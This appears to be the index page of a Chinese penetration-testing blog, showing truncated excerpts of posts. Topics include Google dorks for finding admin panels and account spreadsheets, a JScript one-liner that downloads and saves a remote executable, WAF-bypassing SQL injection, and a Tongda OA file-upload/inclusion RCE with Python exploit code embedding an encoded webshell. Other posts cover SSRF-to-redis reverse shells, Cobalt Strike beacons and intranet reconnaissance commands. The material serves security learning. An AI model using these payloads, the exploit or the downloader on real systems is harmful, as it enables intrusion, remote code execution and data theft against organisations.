google hack搜索引擎常用总结
简介
在渗透测试中,利用搜索引擎信息收集还是很不错,常常有意外的收获,也可以用在一些镜像库里面搜索信息收集
还有之前看到的一些,都总结分享一下
主要的常用一些语法12345678910111213site:可以限制你搜索范围的域名inurl:用于搜索网页上包含的URL,这个语法对寻找网页上的搜索,帮助之类的很有用.intext: 只搜索网页部分中包含的文字(也就是忽略了标题、URL等的文字)intitle: 查包含关键词的页面,一般用于社工别人的webshell密码filetype:搜索文件的后缀或者扩展名intitle:限制你搜索的网页标题.link: 可以得到一个所有包含了某个指定URL的页面列表.
实例查找后台地址:site域名
12这个真的好用查看某公司的表格找账户:site:域名 filetype:xlsx
1234567891011121314151617inurl:login|admin|manage|member|admin_login|login_admin|system|login|user|main|cms查找文本内容:site:域名 intext:管理 ...
一句话下载payload(持续更新)
js一句话下载payloadwindows 全版本都会默认支持 js,并且通过cscript 来调用达到下载 payload 的目的。
12345678var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);BinStream.SaveToFile("micropoor.exe");
1C:\test>cscript /nologo dowfile2.js http://192.168.1.1/eval.exe
还 ...
从绕过安全狗到编写tamper脚本
文章目录
0x00 简述
0x01 首先我们要判断哪个关键字被拦截了
0x02 一些简单的知识点
0x03 总结安全狗拦截的点
0x04 Sqlmap tamper的编写
0x05 tamper主要的三个部分
0x06 tamper编写测试方法
0x07 结束
0x00 简述
安全狗这些waf都是有一个特性,都是基于正则匹配去过滤的
但是实际情况是需要权衡可用性和安全性
当然厂商肯定是考虑到用户体验,所以不能出现什么东西都拦截
所以最终就是正则的绕过
注意:
版本不同,他的正则规则也是不一样的
所以有的payload在新老版本是不能同吃。
但是没有关系,你学会这么绕,这都不是问题。
0x01 首先我们要判断哪个关键字被拦截了我们以 order by 3 这个简单的语句为例子
提供思路就是破坏单词去测试:
123456http://10.211.55.4/Less-2/?id=1 order by 3 (拦截)http://10.211.55.4/Less-2/?id=1 ordwer by 3 (破坏了order 没有拦截)http://10.211.55.4/Less-2/ ...
记一次360众测仿真实战靶场考核WP
0x00 考核主要分为两部分
第一部分为客观题:分为单选题,多选题,和判断题。
我记录了一道有趣的题,也是不清楚正确答案的群
第二部分为操作题:
0x01客观题我记录了一道有趣的题,也是不清楚正确答案,有大佬知道吗
0x02:操作题
源码分析题,给你源码提及一个数据
PHP == 弱语言绕过 ,因为没弄过CTF也是印象比较深刻
网站被黑,可以下载整站,找后门
下载源码,找见后门webshell,看一眼,变形的一句话,连上
一个加密的一句话木马
就普通一句话各种decode
IP伪造登陆 X-FORWORD
只能客户端登陆
一个弹幕网站
进去发现是Struts2的,有工具一把梭
xxx系统的数据库系统。postgresql
识别出来是postgresql,但是连上了啥也没找到,没做出来。。。
一个登录框
点点发现有注入,sqlmap直接跑了
wireshark分析数据包的
有人改了数据库密码 找到修改的 数据库密码
wireshark分析数据包的
删除数据库记录的ip
wireshark分析数据包的
找上传者的ip
...
通达OA任意文件上传/文件包含RCE漏洞分析
通达OA任意文件上传/文件包含RCE漏洞分析
0x01 前提
0x01 漏洞介绍
0x02 漏洞分析
首先下载安装
绕过身份验证文件上传部分
变量传递问题
文件包含部分
0x01 前提关于这个漏洞的利用方式:
利用方式大致有两种:
包含日志文件。
绕过身份验证文件上传然后在文件包含。
下面主要分析第二种
0x01 漏洞介绍_通达OA_系统代表了协同OA的先进理念,16年研发铸就成熟OA产品,协同OA软件行业唯一央企团队研发,多次摘取国内OA软件金奖,拥有2万多家正式用户,8万多家免费版用户,超过…
主要危害:
攻击者可以在为登陆或者说,无任何条件触发漏洞,上传图片木马文件,请求进行文件包含最终可达成远程命令执行
影响版本:
V11版
2017版
2016版
2015版
2013版
2013增强版
0x02 漏洞分析我用的官网下载的V11.3
利用方式大致有两种:
包含日志文件。
绕过身份验证文件上传然后在文件包含。
下面我主要分析饶过权限上传,然后文件包含的方式:
首先下载安装打开源码一看,都加密了,使用zend进行了加密。
所以先要进行解密,百度 ...
浅谈SSRF 加redis反弹shell
0x00 SSRF简介和原理
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种利用漏洞伪造服务器端发起请求。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。
通过控制功能中的发起请求的服务来当作跳板攻击内网中其他服务。比如,通过控制前台的请求远程地址加载的响应,来让请求数据由远程的URL域名修改为请求本地、或者内网的IP地址及服务,来造成对内网系统的攻击。
0x01 漏洞危害
扫描内网开放服务
向内部任意主机的任意端口发送payload来攻击内网服务
攻击内网的web应用,例如直接SQL注入、XSS攻击等
利用file、gopher、dict协议读取本地文件、执行命令等
0x02 漏洞常出现的地方1.社交分享功能:获取超链接的标题等内容进行显示
2.转码服务:通过URL地址把原地址的网页内容调优使其适合手机屏幕浏览
3.在线翻译:给网址翻译对应网页的内容
4.图片加载/下载:例如富文本编辑器中的点击下载图片到本地;通过URL地址加载或下载图片
5.图片/文章收藏功能:主要其会取URL地址中titl ...
通达OA前台RCE加EXP任意文件上传+文件包含
RCE思路如下:未授权上传文件(jpg)->php代码包含->rce理论上是通杀,但是貌似2015版没有包含功能大家可以复现了
123456789101112131415161718192021222324252627282930313233343536import osimport requests# 定义webshell,因为是包含,所以用写入马比较方便# 这个马自带bypass disable_function 功能shell = '''<?php$fp = fopen('poc.php', 'w+');$a = base64_decode("JTNDJTNGcGhwJTBBJTI0Y29tbWFuZCUzRCUyNF9HRVQlNWIlMjdhJTI3JTVkJTNCJTBBJTI0d3NoJTIwJTNEJTIwbmV3JTIwQ09NJTI4JTI3V1NjcmlwdC5zaGVsbCUyNyUyOSUzQiUwQSUyNGV4ZWMlMjAlM0QlMjAlMjR3c2 ...
内网安全学习从入门到入狱-神器-Cobalt Strike-二-Beacon简介和使用
内网安全学习从入门到入狱-神器-Cobalt Strike2-Beacon简介和使用内网安全学习从入门到入狱-神器-Cobalt Strike-二-Beacon简介和使用
内网安全学习从入门到入狱-神器-Cobalt Strike2-Beacon简介和使用
0x01简单的木马打到一台PC
生成win的 Payload
0x02 beacon的介绍和使用
Beacon简介
Beacon分类:
http beacon
DNS beacon
SMB beacon
进入beacon
简单的命令执行
最常用的修改心跳包
内网安全学习从入门到入狱-工具-Cobalt Strike(cs)基础
上一次Cobalt Strike写到简单的介绍和启动服务和打开
这一次我们写简单的木马生成以便介绍后续的功能
介绍一下beacon的作用和一下常用的操作
0x01简单的木马打到一台PC我们得有一个机子才能做后续的实验吧,所以
这算是获得了一个入口的机器
这才是一台win7来介绍一下beacon
生成win的 Payload1、attacks-packages-Windows ...
内网安全学习从入门到入狱-知识-内网信息探测与收集
内网安全学习从入门到入狱-知识-内网信息收集内网信息收集-工作组和域内基本信息收集
内网安全学习从入门到入狱-知识-内网信息收集
0x01本机检查–先看看我是谁
查询并开启远程连接服务
0x02域内信息收集
查询当前额权限
判断是否有域
查找域控
获取域内的用户信息
0x03 域内网存活主机的探测
主机存活扫描
域内端口扫描
PowerSploit 中的 Invoke-Portscan.ps1 脚本
前提准备
本文中PowerShell脚本可以自行下载
https://github.com/PowerShellMafia/PowerSploit
0x01本机检查–先看看我是谁域内的主机一般都是批量的,所以我们看看我们自己,基本上大家也就是差不多的情况
先看看ip,看看网卡,内外网情况,IP段记录一下,DNS
1ipconfig /all
查看用户列表
1net user
查看在线的用户
1query user || qwinsta
查看本机管理员
1net localgroup administrators
看管理员进程
...
Python中prettytable输出美化再加进度条
- Python通过prettytable模块将输出内容如表格输出 比自己那个高端的多了
而且十分简单的使用
1安装得有吧
1pip install PrettyTable
2导入模块
1import prettytable as pt
直接给例子
123456789101112131415import prettytable as pt# 添加表头table = pt.PrettyTable(["URL", "参数", "沙雕"])# add_row 添加一行数据table.add_row(["http://aaa.com", "raskv", "123123"])table.add_row(["http://bbb.com", "susd", "123123"])table.add_row(["http://ccc.com", "pwd", " ...